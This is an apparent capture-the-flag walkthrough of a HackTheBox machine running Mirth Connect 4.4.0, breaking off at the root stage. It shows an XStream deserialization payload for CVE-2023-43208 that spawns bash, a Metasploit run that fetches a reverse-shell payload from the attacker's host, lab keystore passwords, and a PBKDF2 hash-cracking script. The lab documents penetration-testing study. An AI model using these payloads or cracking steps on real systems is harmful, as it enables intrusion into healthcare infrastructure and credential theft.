🎯 Machine Overview
Interpretor is an active HackTheBox machine that challenges players with real-world penetration testing scenarios. This machine focuses on careful enumeration, exploitation techniques, and creative privilege escalation paths. As this is an active HTB machine, this writeup will provide valuable insights into the methodology and approach used to compromise the system.
1 RECON
1.1 Port Scan
nmap -p- -sV -sC 10.129.5xxxxxx
Result:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 07:eb:d1:b1:61:9a:6f:38:08:e0:1e:3e:5b:61:03:b9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDVuD7K78VPFJrRRqOF1sCo4+cr9vm+x+VG1KLHzsgeEp3WWH2MIzd0yi/6eSzNDprifXbxlBCdvIR/et0G0lKI=
| 256 fc:d5:7a:ca:8c:4f:c1:bd:c7:2f:3a:ef:e1:5e:99:0f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILAfcF/jsYtk8PnokOcYPpkfMdPrKcKdjel2yqgNEtU3
80/tcp open http syn-ack Jetty
| http-methods:
| Supported Methods: GET HEAD TRACE OPTIONS
|_ Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: 62BE2608829EE4917ACB671EF40D5688
|_http-title: Mirth Connect Administrator
443/tcp open ssl/http syn-ack Jetty
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mirth-connect
| Issuer: commonName=Mirth Connect Certificate Authority
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-19T12:50:05
| Not valid after: 2075-09-19T12:50:05
| MD5: c251:9050:6882:4177:9dbc:c609:d325:dd54
| SHA-1: 3f2b:a7d8:5c81:9ecf:6e15:cb6a:fdc6:df02:8d9b:1179
| http-methods:
| Supported Methods: GET HEAD TRACE OPTIONS
|_ Potentially risky methods: TRACE
|_http-title: Mirth Connect Administrator
6661/tcp open unknown syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Overview:
- 22/tcp — SSH
- 80/tcp — HTTP (Jetty → Mirth Connect Administrator)
- 443/tcp — HTTPS (Jetty → Mirth Connect Administrator)
- 6661/tcp — Needed for Mirth
1.2 Web Application
Mirth Connect webadmin interface: When exposed to the internet, it is frequently game over. Unlike typical web apps, Mirth’s real power resides in the desktop administrator client, not the web UI.
2 WEB
2.1 Mirth Connect

Mirth Connect (now NextGen Connect) is an enterprise healthcare integration engine — built for HL7 processing, message routing, transformation pipelines, database connectors, and embedded scripting. In practice, it’s a programmable middleware hub sitting at the center of hospital infrastructure.
2.1.1 Vulnerable Design
Java applications like this are risky by nature. Mirth processes healthcare messages through modular channels:
Input → Transformer → Filters → Destinations
Internally, each target system is modeled as a “Patient”. At the core, it relies on the Java Transformer class to deserialize data into executable logic. Each step can execute:
- JavaScript
- Java code via interop
- File operations
- Network calls
- Database queries
In other words, the platform is already capable of running arbitrary logic by design.
2.1.2 Java Web Start Descriptor (JNLP)
From the web admin portal, the green button downloads a configuration file used to launch the Mirth Connect Administrator client:

<jnlp codebase="http://interpretor.htb:80" version="4.4.0">
<information>
<title>Mirth Connect Administrator 4.4.0</title>
<vendor>NextGen Healthcare</vendor>
<homepage href="http://www.nextgen.com"/>
<description>Open Source Healthcare Integration Engine</description>
<icon href="images/NG_MC_Icon_128x128.png"/>
<icon href="images/MirthConnect_Logo_WordMark_Big.png" kind="splash"/>
<offline-allowed/>
<shortcut online="true">
<!-- put a shortcut on the desktop -->
<desktop/>
<!-- put shortcut in start menu too -->
<menu submenu="Mirth Connect"/>
</shortcut>
</information>
<security>
<all-permissions/>
</security>
<update check="timeout" policy="always"/>
<resources>
<j2se href="http://java.sun.com/products/autodl/j2se" java-vm-args="--add-modules=java.sql.rowset --add-exports=java.base/com.sun.crypto.provider=ALL-UNNAMED --add-exports=java.base/sun.security.provider=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.lang.reflect=ALL-UNNAMED --add-opens=java.base/java.math=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.security=ALL-UNNAMED --add-opens=java.base/java.security.cert=ALL-UNNAMED --add-opens=java.base/java.text=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/sun.security.pkcs=ALL-UNNAMED --add-opens=java.base/sun.security.rsa=ALL-UNNAMED --add-opens=java.base/sun.security.x509=ALL-UNNAMED --add-opens=java.desktop/com.apple.eawt=ALL-UNNAMED --add-opens=java.desktop/com.apple.eio=ALL-UNNAMED --add-opens=java.desktop/java.awt=ALL-UNNAMED --add-opens=java.desktop/java.awt.color=ALL-UNNAMED --add-opens=java.desktop/java.awt.font=ALL-UNNAMED --add-opens=java.desktop/javax.swing=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED" max-heap-size="512m" version="1.9+"/>
<j2se href="http://java.sun.com/products/autodl/j2se" max-heap-size="512m" version="1.6+"/>
<jar download="eager" href="webstart/client-lib/mirth-client.jar" main="true" sha256="IHeDHNaFglz/afA4Osr3nllnqCMpsgo6RmrVTjbKBsA="/>
<jar download="eager" href="webstart/client-lib/mirth-client-core.jar" sha256="Ms8xCKJF4OPd0YHeM0I+dPyfKB4sdsXHcQsubFBfvz4="/>
<jar download="eager" href="webstart/client-lib/mirth-crypto.jar" sha256="3QGDVXdCJU/pevR+R0wnBGKnI6Ffuigbt4xNw8IOJKM="/>
<jar download="eager" href="webstart/client-lib/mirth-vocab.jar" sha256="C20/n2aTWZFxY4x8iEBcrLWGzz5taUMTlWLezAcpCRs="/>
<jar download="eager" href="webstart/client-lib/commons-lang3-3.9.jar" sha256="Vgwgrwq6WiuqsbpFY2oAq3y8dYHTsrQXc7BT8d4Bjmg="/>
<jar download="eager" href="webstart/client-lib/jackson-core-2.11.3.jar" sha256="Sn93THoyv2dXoxnx/FGS4YJgW0bWpBuzLPUo2S2fsWw="/>
<jar download="eager" href="webstart/client-lib/language_support.jar" sha256="sAzNPDx8Zcc+miVKCivSPaJC3fSCwgPE7y/tWM6f48A="/>
<jar download="eager" href="webstart/client-lib/donkey-model.jar" sha256="rUOeInGLuiIRKZpUgosD/5Jeitea+mMtVfy/WGS8B1Q="/>
<jar download="eager" href="webstart/client-lib/commons-configuration2-2.7.jar" sha256="QcDVizhsNICZPRi4XT7K+hBgm9KNFdRPLetbna1te80="/>
<jar download="eager" href="webstart/client-lib/commons-codec-1.13.jar" sha256="rqMdWtimh21sVB/oZf/qwut33nVpNeXVPm74vfuVmKY="/>
<jar download="eager" href="webstart/client-lib/jetty-util-9.4.44.v20210927.jar" sha256="FwOCGovjairWKH7Rg7r1knTLOnid4R9I0M0EbsjNJ7s="/>
<jar download="eager" href="webstart/client-lib/log4j-1.2-api-2.17.2.jar" sha256="4Gi6JmmLeoPW/o6DYZMFl8zZoyZIHZ//sPJP27A7AVY="/>
<jar download="eager" href="webstart/client-lib/javax.annotation-api-1.3.jar" sha256="B9B2My7V8CSIJT6+VqrdC2qTKlHBi5VQtNEcFTDdiI8="/>
<jar download="eager" href="webstart/client-lib/hk2-locator-2.4.0-b31.jar" sha256="OTY93Favv8bFowgge5fv/nizGE2Vhp7IATYrVwNs6wI="/>
<jar download="eager" href="webstart/client-lib/velocity-tools-generic-3.0.jar" sha256="ItFZhaj2pSWqreMV0hiT2hpN9Es6wxznasfNlgwomEY="/>
<jar download="eager" href="webstart/client-lib/mimepull-1.9.7.jar" sha256="IR3nxpVPJFHkB7rqiX14vBJbeg3kLStX30X9XiIgh98="/>
<jar download="eager" href="webstart/client-lib/zip4j_1.3.3.jar" sha256="Nq0nH85RbGL9D3KOlo1UIciuuhJo75yL4CpSakYXRn0="/>
<jar download="eager" href="webstart/client-lib/commons-io-2.6.jar" sha256="ETnAc6KUHMebRMv0FKWTlUF7Et8vHlMw3uagiYOQlag="/>
<jar download="eager" href="webstart/client-lib/commons-collections4-4.4.jar" sha256="nW5g92kH9CucRW1+B3OI4oTvsICWwwd/7hkkbMFdIWc="/>
<jar download="eager" href="webstart/client-lib/rsyntaxtextarea-2.5.6.jar" sha256="5AwU0m/gEfep5vsTDox3h+iFRielROm8Ee3aD6vTKTQ="/>
<jar download="eager" href="webstart/client-lib/quartz-all-2.1.7.jar" sha256="s8iEI5/GpBxXvE6bF76gPuzeIsc6H/+6ybO7RIDPxGI="/>
<jar download="eager" href="webstart/client-lib/commons-text-1.10.0.jar" sha256="mkbZGbj6rJ+DfxfzXg9K71+fjTzg5fKS4q+5hKE6FXY="/>
<jar download="eager" href="webstart/client-lib/autocomplete-2.5.4.jar" sha256="e4ZfCl5M9ElresOdHO30kzKqv79SxvpW3hWyxsVEK3w="/>
<jar download="eager" href="webstart/client-lib/utils-2.15.28.jar" sha256="F2h3NoUjlAcsMb7Tzr/1SnHQDE3jLNnk/94nym9ERV4="/>
<jar download="eager" href="webstart/client-lib/xpp3-1.1.4c.jar" sha256="sRmgN+Q81MVgJ+0eJaPPWatm39tYtHFRx6XxgvtLkec="/>
<jar download="eager" href="webstart/client-lib/libphonenumber-8.12.50.jar" sha256="tjWFlc1nGTCQKOUgi/w7sWHGmTpeoerafoRZeOM4Q5o="/>
<jar download="eager" href="webstart/client-lib/log4j-core-2.17.2.jar" sha256="fylUDk4s8265Vk+Y/jvkLsW8x8e5VjJUjTS1v8VEkrs="/>
<jar download="eager" href="webstart/client-lib/jersey-proxy-client-2.22.1.jar" sha256="kCMvyNtvYX9sgjMt5OnZ2gJ163vYkDhLYoV/xpUs3Co="/>
<jar download="eager" href="webstart/client-lib/commons-vfs2-2.1.jar" sha256="AeG82Lit+p/45dInSR8cxRZ8Eb2LmIQelpPHRGEG3Fg="/>
<jar download="eager" href="webstart/client-lib/commons-logging-1.2.jar" sha256="KBnbQ2TXK5shS9/peQgDFVll50w6kAMfBVzKVTgfMV4="/>
<jar download="eager" href="webstart/client-lib/swagger-annotations-2.0.10.jar" sha256="obRzCEphaiLShGrWm3d1fEGpKaTwmsAN7RVwNpc4ybg="/>
<jar download="eager" href="webstart/client-lib/xstream-1.4.19.jar" sha256="An1TfdUt/dyRZWO1O4L3OB8/I2JYJnHX/7u7e07lrfs="/>
<jar download="eager" href="webstart/client-lib/hapi-structures-v28-2.3.jar" sha256="LIlghnHInyIiHFipUqQEqo3w3/JHwBbVXKNhtH3vSpw="/>
<jar download="eager" href="webstart/client-lib/looks-2.3.1.jar" sha256="YAGKqTQk1/doNoOzJ1me0F2OBO7bRAEa052xk2Y4Qxc="/>
<jar download="eager" href="webstart/client-lib/jaxb-runtime-2.4.0-b180725.0644.jar" sha256="p+osvQhxLrgqF4woPOlD78SuhWAGS74O3nGOq2lsYt8="/>
<jar download="eager" href="webstart/client-lib/jcifs-ng-2.1.8.jar" sha256="1LMOZ6bPn/yHjkrqho3k+KVvs0hCENbK4sh0lA7AefE="/>
<jar download="eager" href="webstart/client-lib/swingx-core-1.6.2.jar" sha256="Krugs5yfMGY+hJP2YtVjQzk2fEBIDqKNL+Mpc0zs93E="/>
<jar download="eager" href="webstart/client-lib/hapi-structures-v23-2.3.jar" sha256="JlCBJVERFzAiyp4INZU5rdaQqHJRzlusNXYxwvVbNgA="/>
<jar download="eager" href="webstart/client-lib/hapi-structures-v21-2.3.jar" sha256="SWz11YnwDV8se0huhvnwPbSN3zb+52VnIXrCbxj71os="/>
<jar download="eager" href="webstart/client-lib/bcutil-jdk18on-171.jar" sha256="/jd5If5JVbQraUTgVMUDOsziWVrAdupKbC2YtCaBEYU="/>
<jar download="eager" href="webstart/client-lib/openjfx.jar" sha256="xXKQTb9rtpA+xbbrJv41SeGQsfBLK5od/tjYzSBEfqI="/>
<jar download="eager" href="webstart/client-lib/hapi-base-2.3.jar" sha256="XgloOIjOa0PPHD6YRCtQYz8Sh1wOXd4qZwT8rP0NH2g="/>
<jar download="eager" href="webstart/client-lib/jersey-media-multipart-2.22.1.jar" sha256="NI9cZ1099RlbB1UDeDeqxG+JDk1XL/5QpulQF76VM0E="/>
<jar download="eager" href="webstart/client-lib/httpcore-4.4.13.jar" sha256="7GMATM3FXKnnKJokElaJxSUznUY4lI0nbKKo+XW/Amk="/>
<jar download="eager" href="webstart/client-lib/xercesImpl-2.9.1.jar" sha256="35zfeAILzwjhdB7CmbVNu/IgqdWm92le919CD0vT3Go="/>
<jar download="eager" href="webstart/client-lib/javax.activation-1.2.0.jar" sha256="rV9iEYBiiE0cU0+2Dd3Mqihmk/ykGK62+YGf/7Hmofo="/>
<jar download="eager" href="webstart/client-lib/hk2-api-2.4.0-b31.jar" sha256="Yd0V2fCUvbtCeWsKybYe52IiKr0pcWUXYG2r1qRCKVo="/>
<jar download="eager" href="webstart/client-lib/commons-compress-1.17.jar" sha256="vdHWwrCXRfPZawbulPFXxx/9elZghqPNsYD9Sq/EiRU="/>
<jar download="eager" href="webstart/client-lib/staxon-1.3.jar" sha256="jeWRqRwl0xXZzYCV4hHI9L8Ce/sy9mNVsg1LmzrcH0w="/>
<jar download="eager" href="webstart/client-lib/hapi-structures-v231-2.3.jar" sha256="Zy3A3/aqpUxulbTzSLOfFS/zskDaRtHqcyktQ9Ppl8U="/>
<jar download="eager" href="webstart/client-lib/jackson-databind-2.11.3.jar" sha256="HdpB6UnUciJ4xp3AApqF3SD0DC7XceIsoqy+nvtRO/k="/>
<jar download="eager" href="webstart/client-lib/jersey-guava-2.22.1.jar" sha256="IBqA2V9KW8RRbGf1gi83X1yPbPevBUWvSvSLAsBT/+8="/>
<jar download="eager" href="webstart/client-lib/joda-time-2.9.9.jar" sha256="lbeoqEup9KalPvZCzypvbbIkaIWi2jlKfSpHlQIt1rw="/>
<jar download="eager" href="webstart/client-lib/velocity-engine-core-2.2.jar" sha256="hLoIAPaQME4UpUhH4JM/BaRE1XU/aAsKWpO/a7QtlqM="/>
<jar download="eager" href="webstart/client-lib/javax.inject-2.4.0-b31.jar" sha256="VMorIrzeWoo+lDm5JOnVK0w4Cshu5wEmVgjP6lkqqDw="/>
<jar download="eager" href="webstart/client-lib/jackson-annotations-2.11.3.jar" sha256="DoOzxry+xCjH7dTFsmeOBqnf6tp/MADddqPAc74EbAw="/>
<jar download="eager" href="webstart/client-lib/slf4j-api-1.7.30.jar" sha256="4odF1co8Wo88h4Pmg/GzGh2SKMnnn0Yi04e0Og0Rg6o="/>
<jar download="eager" href="webstart/client-lib/commons-pool2-2.3.jar" sha256="APdgYnfApxJ1KQ+FlfuLhcSYL1J+YfM2gWQG52hhogQ="/>
<jar download="eager" href="webstart/client-lib/javassist-3.26.0-GA.jar" sha256="CIYZWNSYwYzGL6Br67AC6i0neHBvi2JOpCjRjmJGFI0="/>
<jar download="eager" href="webstart/client-lib/guava-28.2-jre.jar" sha256="SyoNyKpmdiFudyjFaul5lMleraSD8E85voyrCpzf9dY="/>
<jar download="eager" href="webstart/client-lib/jaxb-api-2.4.0-b180725.0427.jar" sha256="l9sDNL727nZkvNzCarcpq7jd8VcMu3ss6FNOSG57/NQ="/>
<jar download="eager" href="webstart/client-lib/httpmime-4.5.13.jar" sha256="7R/v9tFfvVFBimz7msrZ1B6Zfq5bGQqFDkyYFterJMM="/>
<jar download="eager" href="webstart/client-lib/wizard.jar" sha256="7OYEhgqNU7QJqK9bHGJNJqxFCi4oWVlF8XtYwBaPdOo="/>
<jar download="eager" href="webstart/client-lib/hapi-structures-v22-2.3.jar" sha256="OjQVkkOwGi+iGVkPv9q06zuiHw6ER+iUMlZJJHc35ZA="/>
<jar download="eager" href="webstart/client-lib/miglayout-swing-4.2.jar" sha256="Mx8CMy2FiaUHSLJB4nSirw4XWrQiuzZuHbTK385bnIk="/>
<jar download="eager" href="webstart/client-lib/hapi-structures-v25-2.3.jar" sha256="9SblQqKV9egD7z7obYD6BnY/nTXvli5+uPkLYDvsYAs="/>
<jar download="eager" href="webstart/client-lib/reflections-0.9.10.jar" sha256="IPDk2Q6OmWaPvh4hRXVM0PYCrWryNVd0aaiufWFahNk="/>
<jar download="eager" href="webstart/client-lib/javaparser-1.0.8.jar" sha256="cUyZFy6pW06C7BeXIVnQH1jSDjn+D6NOvFLdxZm0v3U="/>
<jar download="eager" href="webstart/client-lib/miglayout-core-4.2.jar" sha256="0ajHMEw8GsCWLq1gSh9zhJp+FRGHhq//sRO2RTz9EtU="/>
<jar download="eager" href="webstart/client-lib/bcprov-ext-jdk18on-171.jar" sha256="/1v9cPkedM2dS61zfPb1QRczEb2XjDx8IxQ+vX3EgqM="/>
<jar download="eager" href="webstart/client-lib/jersey-common-2.22.1.jar" sha256="w1a3DUxOzMnN3ShUe3BgqKq+LQZuRXbjf7XPGAGSyH4="/>
<jar download="eager" href="webstart/client-lib/hapi-structures-v26-2.3.jar" sha256="/sdcfbvvni4u7iJ7C4fAoGuqBV3SKt+oaeaUmrz7soc="/>
<jar download="eager" href="webstart/client-lib/javax.ws.rs-api-2.0.1.jar" sha256="1anYrmLH6XVLuL6UdyHChnVC63G88ZN6ksYVKDHrwWY="/>
<jar download="eager" href="webstart/client-lib/rhino-1.7.13.jar" sha256="9YLjcaeQjbLFrlnNeNAPPFyO7GwkWeoivlB+cHf/LGw="/>
<jar download="eager" href="webstart/client-lib/hapi-structures-v251-2.3.jar" sha256="PKc8cQQrOWODAnNyWfbj0YGGoZlR2+ekBnToOn9XIp4="/>
<jar download="eager" href="webstart/client-lib/bcpkix-jdk18on-171.jar" sha256="skuBILkn+PcpJuDP/M9di3Nu3hlq93rYuSSgS2/ovtQ="/>
<jar download="eager" href="webstart/client-lib/javax.mail-1.5.0.jar" sha256="flDlXMAW8Rl7/D5PRT6aziJ5+BFLgCkly4USmIUJnj0="/>
<jar download="eager" href="webstart/client-lib/slf4j-log4j12-1.7.30.jar" sha256="7G71CIScs6JqQn95E5IH01sMkDdrP/BDQgCS9ZwmIvE="/>
<jar download="eager" href="webstart/client-lib/jai_imageio.jar" sha256="Sv+7VsN2v7lCseg/10Hfl+25Z17DIjbBFS5LW8uSCzc="/>
<jar download="eager" href="webstart/client-lib/javax.activation-api-1.2.0.jar" sha256="v3ndkHoaiEwiTJpm9177HFQztgaZC5VfN9B2jdrkhFs="/>
<jar download="eager" href="webstart/client-lib/hapi-structures-v27-2.3.jar" sha256="fJ668/E7otWgs7SA1jHiiCpKHSHAiouVPKS3IO1Zcq4="/>
<jar download="eager" href="webstart/client-lib/userutil-sources.jar" sha256="1BGr/v2Og/FH2XYS244rEs7fsLEu1BmKQmSpWHRn05U="/>
<jar download="eager" href="webstart/client-lib/bcprov-jdk18on-171.jar" sha256="l7kndUKXP0Boq6mlKee5Qo78WjkJEH2nDYp/+PbhVkI="/>
<jar download="eager" href="webstart/client-lib/hapi-structures-v281-2.3.jar" sha256="4s3VMiZqi8XRR8R2ojsgD9sALwtqw4wnSRa0d0YxYtU="/>
<jar download="eager" href="webstart/client-lib/jersey-client-2.22.1.jar" sha256="gmAUfqtAN3AeddIKF40h1pvUB10Qzdy3+Z6zWKXueTY="/>
<jar download="eager" href="webstart/client-lib/log4j-api-2.17.2.jar" sha256="Rpvu+JLDk4rkoNnRr8C9xI57yHVBwTB0tvAL8zSi5cY="/>
<jar download="eager" href="webstart/client-lib/httpclient-4.5.13.jar" sha256="G87KYCKVy/05s9g44w8cILxtugjhab6FyoM24Xcov9M="/>
<jar download="eager" href="webstart/client-lib/istack-commons-runtime-3.0.6.jar" sha256="r7Pdb2yYKzY3TR1m8Nq8nR52JTeX9WjlGYZWwvQQMrU="/>
<jar download="eager" href="webstart/client-lib/hapi-structures-v24-2.3.jar" sha256="m6ulzJ/p9GGit/n3kid3O2VDZSSGdSgzltNd1UVGFuw="/>
<jar download="eager" href="webstart/client-lib/commons-lang-2.6.jar" sha256="NKmzkdAArMvPlzkusZAE3/wiKSk1XsdzJONkUQvG8dk="/>
<jar download="eager" href="webstart/client-lib/commons-beanutils-1.9.3.jar" sha256="rpgEMWYeRxs6wfLVCeOCrgm2CWo+QdSNPxLK05zWz9k="/>
<jar download="eager" href="webstart/client-lib/regions-2.15.28.jar" sha256="DO+3VI3z+GW/FSgxHWsjJ6ddn3FedIBCeRkdvjUSWc0="/>
<jar download="eager" href="webstart/client-lib/hk2-utils-2.4.0-b31.jar" sha256="1dSEKIqf2Ocip0f+5elBZJxi6UnRoaLg5RsfdzNluTI="/>
<extension href="webstart/extensions/scriptfilestep.jnlp"/>
<extension href="webstart/extensions/textviewer.jnlp"/>
<extension href="webstart/extensions/dicomviewer.jnlp"/>
<extension href="webstart/extensions/js.jnlp"/>
<extension href="webstart/extensions/jdbc.jnlp"/>
<extension href="webstart/extensions/mapper.jnlp"/>
<extension href="webstart/extensions/directoryresource.jnlp"/>
<extension href="webstart/extensions/datapruner.jnlp"/>
<extension href="webstart/extensions/javascriptrule.jnlp"/>
<extension href="webstart/extensions/datatype-xml.jnlp"/>
<extension href="webstart/extensions/datatype-ncpdp.jnlp"/>
<extension href="webstart/extensions/jms.jnlp"/>
<extension href="webstart/extensions/datatype-json.jnlp"/>
<extension href="webstart/extensions/xsltstep.jnlp"/>
<extension href="webstart/extensions/file.jnlp"/>
<extension href="webstart/extensions/scriptfilerule.jnlp"/>
<extension href="webstart/extensions/messagebuilder.jnlp"/>
<extension href="webstart/extensions/datatype-dicom.jnlp"/>
<extension href="webstart/extensions/serverlog.jnlp"/>
<extension href="webstart/extensions/datatype-hl7v3.jnlp"/>
<extension href="webstart/extensions/datatype-hl7v2.jnlp"/>
<extension href="webstart/extensions/ws.jnlp"/>
<extension href="webstart/extensions/javascriptstep.jnlp"/>
<extension href="webstart/extensions/dashboardstatus.jnlp"/>
<extension href="webstart/extensions/datatype-raw.jnlp"/>
<extension href="webstart/extensions/tcp.jnlp"/>
<extension href="webstart/extensions/datatype-edi.jnlp"/>
<extension href="webstart/extensions/smtp.jnlp"/>
<extension href="webstart/extensions/globalmapviewer.jnlp"/>
<extension href="webstart/extensions/httpauth.jnlp"/>
<extension href="webstart/extensions/dicom.jnlp"/>
<extension href="webstart/extensions/imageviewer.jnlp"/>
<extension href="webstart/extensions/mllpmode.jnlp"/>
<extension href="webstart/extensions/pdfviewer.jnlp"/>
<extension href="webstart/extensions/destinationsetfilter.jnlp"/>
<extension href="webstart/extensions/vm.jnlp"/>
<extension href="webstart/extensions/http.jnlp"/>
<extension href="webstart/extensions/doc.jnlp"/>
<extension href="webstart/extensions/rulebuilder.jnlp"/>
<extension href="webstart/extensions/datatype-delimited.jnlp"/>
</resources>
<application-desc main-class="com.mirth.connect.client.ui.Mirth">
<argument>https://interpretor.htb:443</argument>
<argument>4.4.0</argument>
</application-desc>
</jnlp>
This Java-based application uses XML descriptors as launch initializers. More importantly, the file exposes precise fingerprints: Target = NextGen (Mirth) Connect 4.4.0.
2.1.3 The CVE Hunt
I went on a little CVE hunt and it was great

We got something worth mentioning and that was the CVE-2023-43208

2.2 CVE-2023-43208
Version 4.4.0 is affected by a critical Java deserialization flaw originally tracked as CVE-2023-37679. An incomplete fix later introduced a bypass, assigned CVE-2023-43208.
2.2.1 Deserialization RCE
CVE-2023-37679 is an unauthenticated remote code execution vulnerability caused by unsafe Java deserialization of attacker-controlled input exposed through an HTTP endpoint. Mirth Connect provides REST APIs that accept XML payloads. Requests with Content-Type: application/xml are handled by a global JAX-RS provider, XmlMessageBodyReader, which deserializes the request body into Java objects:
@Provider
@Singleton
@Consumes(MediaType.APPLICATION_XML)
public class XmlMessageBodyReader implements MessageBodyReader<Object> {
@Override
public Object readFrom(Class<Object> type, Type genericType,
Annotation[] annotations, MediaType mediaType,
MultivaluedMap<String,String> headers,
InputStream entityStream) throws IOException {
return ObjectXMLSerializer.getInstance()
.deserialize(IOUtils.toString(entityStream, "UTF-8"), type);
}
}
Deserialization is performed by ObjectXMLSerializer, which relies on the XStream library. Because XStream rebuilds object graphs directly from XML, attacker input can instantiate arbitrary classes during unmarshalling, enabling gadget-chain execution.
Authentication is normally enforced by the base class MirthServlet via initLogin(). However, several API servlets — including UserServlet, SystemServlet, and ConfigurationServlet — explicitly disable this protection by calling the parent constructor with initLogin=false:
public class UserServlet extends MirthServlet {
public UserServlet(@Context HttpServletRequest request,
@Context SecurityContext sc) {
super(request, sc, false); // auth disabled here
}
}
Attack flow:
Unauthenticated XML request → XmlMessageBodyReader intercepts request → ObjectXMLSerializer → XStream unmarshalling → Gadget chain executes during deserialization → Remote code execution as Mirth service user

Example malicious XML payload:
<sorted-set>
<string>ABCD</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>bash</string>
<string> -c</string>
<string>{cmd}</string>
</command>
</target>
<methodName>start</methodName>
<eventTypes/>
</handler>
</dynamic-proxy>
</sorted-set>
2.2.2 Metasploit
Start MSF and load the exploit:
[msf](Jobs:0 Agents:0) >> use exploit/multi/http/mirth_connect_cve_2023_43208
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/http/mirth_connect_cve_2023_43208) >> options
Module options (exploit/multi/http/mirth_connect_cve_2023_43208):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant als
o Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST 10.114.129.161 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME xGHfNfTg no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Unix Command
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) exploit(multi/http/mirth_connect_cve_2023_43208) >>
Configure and run:
msf exploit(...) > set RHOST interpreter.htb
msf exploit(...) > set RPORT 443
msf exploit(...) > set LHOST tun0
msf exploit(...) > set LPORT 60001
msf exploit(...) > set FETCH_COMMAND wget
msf exploit(...) > run

3 USER
3.1 Mirth Internal
3.1.1 Mirth Properties
Locate the configuration file: <MIRTH_HOME>/conf/mirth.properties
# Mirth Connect configuration file
dir.appdata = /var/lib/mirthconnect
dir.tempdata = ${dir.appdata}/temp
3.1.2 Keystore Credentials
The properties file contains keystore passwords:
keystore.path = /var/lib/mirthconnect/keystore.jks
keystore.storepass = 5GbU5HGTOOgE
keystore.keypass = tAuJfQeXdnPw

3.1.3 MySQL

Access the database: mysql -u mirthdb -p mc_bdd_prod
3.2 Mirth Password Hashes
Mirth uses PBKDF2WithHmacSHA256 for password hashing.
- Salt Size: 8 bytes
- Iterations: 600,000
- Key Size: 256 bits
Example hash from DB: u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==
Decoding the hash:
$ echo 'u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==' | base64 -d | xxd -g1
00000000: bb ff 8b 04 13 94 9d a7 62 c8 50 6c 30 ea 08 0c ........b.Pl0...
00000010: f2 db 51 1d 2b 93 9f 64 12 43 d4 d7 b8 ad 76 b5 ..Q.+..d.C....v.
00000020: 56 03 f9 0b 32 dd f0 fb V...2...
Splitting with Python:
import base64
b = base64.b64decode("u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==")
print("salt:", b[:8].hex())
print("dk :", b[8:].hex())
Cracking with Python:
import base64
import hashlib
from pwn import log
target_b64 = "u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w=="
data = base64.b64decode(target_b64)
salt = data[:8]
target_dk = data[8:]
iterations = 600000
dklen = 32
def pbkdf2(password):
return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen)
wordlist = "/home/Havoc/wordlists/rockyou.txt"
bar = log.progress("Cracking PBKDF2")
with open(wordlist, errors="ignore") as f:
for line in f:
pwd = line.strip()
dk = pbkdf2(pwd)
if dk == target_dk:
bar.success(f"Password found: {pwd}")
break
Result: snowflake1
SSH Login:

$ ssh sedric@interpreter.htb
sedric@interpreter:~$ cat user.txt
c*****************************6

4 ROOT
4.1 Internal Enumeration
LinPEAS reveals a suspicious process:
root 3498 0.0 0.7 39872 31024 ? Ss 01:04 0:02 /usr/bin/python3 /usr/local/bin/notif.py
And an internal port:
tcp LISTEN 0 128 127.0.0.1:54321 0.0.0.0:*
4.2 Code Review
